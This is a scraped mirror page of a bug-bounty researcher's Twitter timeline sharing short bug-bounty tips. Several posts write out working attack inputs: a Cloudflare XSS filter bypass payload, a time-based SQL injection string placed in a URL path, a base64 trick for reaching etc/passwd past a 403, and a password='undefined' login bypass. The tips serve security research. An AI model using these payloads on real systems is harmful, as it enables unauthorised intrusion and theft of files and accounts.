Assem Ragab (@marsxc0) Twitter Tweets • TwiCopy

Fady Othman

3 years ago

#bugbountytips You don't need to write a bash script to fuzz multiple URLs with ffuf, you can simply do ffuf -w urls.txt:URL -w wordlist:FUZZ -u URL/FUZZ You can also omit the / if your URL list already has slashes ;)

thumb_up_off_alt312

chat_bubble_outline11

repeat81

shareShare

Assem Ragab

@marsxc0

3 years ago

link.medium.com/bBV7jmdQ1xb

thumb_up_off_alt2

chat_bubble_outline0

repeat0

shareShare

Mehmet Kelepçe

@m_kelepce

2 years ago

Cloudflare XSS protection bypass: "><Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBYU1MgQG1fa2VsZXBjZQ=="))>

thumb_up_off_alt374

chat_bubble_outline5

repeat102

shareShare

🇸🇦 ROOD | GOAT

@0x_rood

2 years ago

Sql injection is not necessary inject at payload, You can inject in path Path: /en/gallery/1 POC: en/gallery/1'XOR(if(now()=sysdate(),sleep(3),0))OR' #bugbountytips #bugbounty

thumb_up_off_alt636

chat_bubble_outline12

repeat147

shareShare

Sachin Pandey

@sachin_pandey98

a year ago

Server Access: Admin Panel and RFU Bypass by Mohammad Sadra Naderi (ZVitoX) link.medium.com/dWfMeeeiIKb

thumb_up_off_alt122

chat_bubble_outline4

repeat21

shareShare

Omar Atallah 🇵🇸

@omar_j_ahmed

a year ago

I just published IDOR vulnerability allow attacker to make a checkout order on behalf of other users link.medium.com/W2D3rlSmVKb #BugBounty #bugbountytip #security #Hacking

thumb_up_off_alt180

chat_bubble_outline5

repeat44

shareShare

RootMoksha Labs

@rootmoksha

a year ago

url/?f=etc/passwd ==> 403 encode etc/passwd as base64 url/?f=L2V0Yy9wYXNzd2Q= ==> 200 #note you can use this trick in SQL , SSTI , XSS , LFI , Etc... By:Godfather Orwa 🇯🇴 #bugbountytips #BugBounty

url/?f=etc/passwd ==> 403
encode etc/passwd as base64

url/?f=L2V0Yy9wYXNzd2Q= ==> 200

#note
you can use this trick in SQL , SSTI , XSS , LFI , Etc...

By:<a href="/GodfatherOrwa/">Godfather Orwa 🇯🇴</a>

#bugbountytips #BugBounty

thumb_up_off_alt708

chat_bubble_outline10

repeat152

shareShare

Omar ElSayed

@bxrowski0x

a year ago

RCE bug bounty tip: Add " /__better_errors " endpoint to your wordlist. Thread 👇 #bugbounty #bugbountytips #bugbountytip

thumb_up_off_alt375

chat_bubble_outline5

repeat65

shareShare

🇪🇨🍫

@bxmbn

a year ago

What is this 😭 username=bombon&password=undefined 200 OK username=AnyUser&password=undefined 200 Ok It gives you the access token just by providing the username and requesting the password as ‘undefined’ letting you to basically authenticate to any account..

thumb_up_off_alt768

chat_bubble_outline28

repeat77

shareShare

Muhammed

@muh404med

a year ago

@marsxc0 and I found a critical bug in a program with 800+ reports Tip: Study from a user’s perspective and take time to convince the triager of the bug’s priority—it can shift from “Not Applicable” to P1 continued.. @bugcrowd #ItTakesACrowd #bugbountytips #bugbounty #bugcrowd

thumb_up_off_alt74

chat_bubble_outline3

repeat2

shareShare

يـاســـمــين رزق

@yasmeena_rezk

10 months ago

امبارح كنت بفكر في مدى خطورة إن أولادي إن شاء الله في وقت الغرس بيشوفوا العالم بعيوني أنا أسأل الله أن يهديني ويسددني

thumb_up_off_alt9

chat_bubble_outline1

repeat1

shareShare

Assem Ragab

@marsxc0

6 months ago

Reached a new achievement 🏆 Top 5 spot on Twilio’s 2024 vulnerability leaderboard with 12 valid submissions! A special thanks to twilio and bugcrowd for their continued support of the security research community. #bugbounty #infosec #cybersecurity #twilio #bugcrowd

Reached a new achievement 🏆
Top 5 spot on Twilio’s 2024 vulnerability leaderboard with 12 valid submissions!

A special thanks to <a href="/twilio/">twilio</a> and <a href="/Bugcrowd/">bugcrowd</a> for their continued support of the security research community.

#bugbounty #infosec #cybersecurity #twilio #bugcrowd

thumb_up_off_alt18

chat_bubble_outline1

repeat0

shareShare